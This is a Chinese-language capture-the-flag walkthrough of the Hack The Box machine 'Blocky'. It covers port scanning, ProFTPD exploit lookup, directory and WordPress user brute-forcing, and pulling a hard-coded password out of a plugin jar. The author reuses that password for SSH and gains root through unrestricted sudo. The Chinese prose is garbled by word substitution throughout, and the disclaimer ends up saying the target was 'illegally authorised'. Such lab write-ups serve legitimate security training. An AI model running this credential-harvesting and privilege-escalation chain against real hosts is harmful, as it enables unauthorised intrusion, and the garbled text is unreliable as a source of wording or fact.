共计 5767 个字符,预计需要花费 15 分钟才能阅读完成。
免责申明
本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用,请不要将文中应用的工具和浸透思路用于任何非法用处,对此产生的所有结果,自己不承当任何责任,也不对造成的任何误用或侵害负责。
服务探测
┌──(root💀kali)-[~/htb/Blocky]
└─# nmap -sV -Pn 10.10.10.37 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-11-29 22:40 EST
Nmap scan report for 10.10.10.37
Host is up (0.34s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 696.03 seconds
开了 ftp,ssh,http 三个服务
80 端口关上是一个 wordpress 站点
ftp 端口貌似存在一个近程执行破绽
┌──(root💀kali)-[~/htb/Blocky]
└─# searchsploit ProFTPD 1.3.5
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
把 36803.py 拷贝到当前目录,exp 要求一个可写 web 目录,咱们当初还不太分明哪里是可写的,须要提高一浸透 80 端口
爆破目录
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.37
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.37/_21-11-29_22-50-04.txt
Error Log: /root/dirsearch/logs/errors-21-11-29_22-50-04.log
Target: http://10.10.10.37/
[22:50:06] Starting:
[22:51:25] 301 - 0B - /index.php -> http://10.10.10.37/
[22:51:29] 301 - 315B - /javascript -> http://10.10.10.37/javascript/
[22:51:32] 200 - 19KB - /license.txt
[22:51:46] 200 - 13KB - /phpmyadmin/doc/html/index.html
[22:51:47] 301 - 315B - /phpmyadmin -> http://10.10.10.37/phpmyadmin/
[22:51:48] 200 - 10KB - /phpmyadmin/
[22:51:48] 301 - 312B - /plugins -> http://10.10.10.37/plugins/
[22:51:48] 200 - 745B - /plugins/
[22:51:49] 200 - 10KB - /phpmyadmin/index.php
[22:51:51] 200 - 7KB - /readme.html
[22:52:11] 200 - 380B - /wiki/
[22:52:11] 301 - 309B - /wiki -> http://10.10.10.37/wiki/
[22:52:11] 301 - 313B - /wp-admin -> http://10.10.10.37/wp-admin/
[22:52:11] 200 - 1B - /wp-admin/admin-ajax.php
[22:52:11] 200 - 1KB - /wp-admin/install.php
[22:52:11] 500 - 4KB - /wp-admin/setup-config.php
[22:52:11] 200 - 0B - /wp-config.php
[22:52:12] 200 - 0B - /wp-content/
[22:52:12] 301 - 315B - /wp-content -> http://10.10.10.37/wp-content/
[22:52:12] 500 - 0B - /wp-content/plugins/hello.php
[22:52:12] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[22:52:12] 200 - 0B - /wp-cron.php
[22:52:12] 301 - 316B - /wp-includes -> http://10.10.10.37/wp-includes/
[22:52:12] 200 - 965B - /wp-content/uploads/
[22:52:12] 500 - 0B - /wp-includes/rss-functions.php
[22:52:12] 200 - 2KB - /wp-login.php
[22:52:12] 302 - 0B - /wp-signup.php -> http://10.10.10.37/wp-login.php?action=register
[22:52:12] 405 - 42B - /xmlrpc.php
[22:52:13] 200 - 40KB - /wp-includes/ 好几个文件夹存在目录遍历破绽。
用 wpsscan 枚举用户名
wpscan –url http://10.10.10.37 –enumerate u1-200
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:17 <============================================================================================================================================================> (200 / 200) 100.00% Time: 00:00:17
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
存在一个叫 notch 的用户
用这个用户名爆破 wp 后盾,ftp,ssh,phpmyadmin 无果 …
初始 shell
如同走入了死胡同。
于是只好在爆破的目录里看看有什么有用的货色,在 /plugins/ 目录里找到两个能够下载的 jar 文件
把 BlockyCore.class 从BlockyCore.jar里分离出来,用 strings 命令查看
┌──(root💀kali)-[~/htb/Blocky]
└─# strings BlockyCore.class
com/myfirstplugin/BlockyCore
java/lang/Object
sqlHost
Ljava/lang/String;
sqlUser
sqlPass
<init>
Code
localhost
root
8YsqfCTnvxAUeduzjNSXe22
LineNumberTable
LocalVariableTable
this
Lcom/myfirstplugin/BlockyCore;
onServerStart
onServerStop
onPlayerJoin
TODO get username
!Welcome to the BlockyCraft!!!!!!!
sendMessage
'(Ljava/lang/String;Ljava/lang/String;)V
username
message
SourceFile
BlockyCore.java
如同有一个用户凭证:root:8YsqfCTnvxAUeduzjNSXe22
然而用来登录 ssh 和 ftp 都不行
而后再用下面的用户名 notch 登录,竟然登进去了,于是找到咱们的初始 shell
┌──(root💀kali)-[~/htb/Blocky]
└─# ssh notch@10.10.10.37
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
notch@Blocky:~$
在 home 目录找到 user.txt
提权
查看 sudo 特权
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL能够应用所有 root 权限命令。。。
那就很简略了,间接提权到 root
notch@Blocky:~$ sudo bash -p
root@Blocky:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Blocky:~# whoami
root
正文完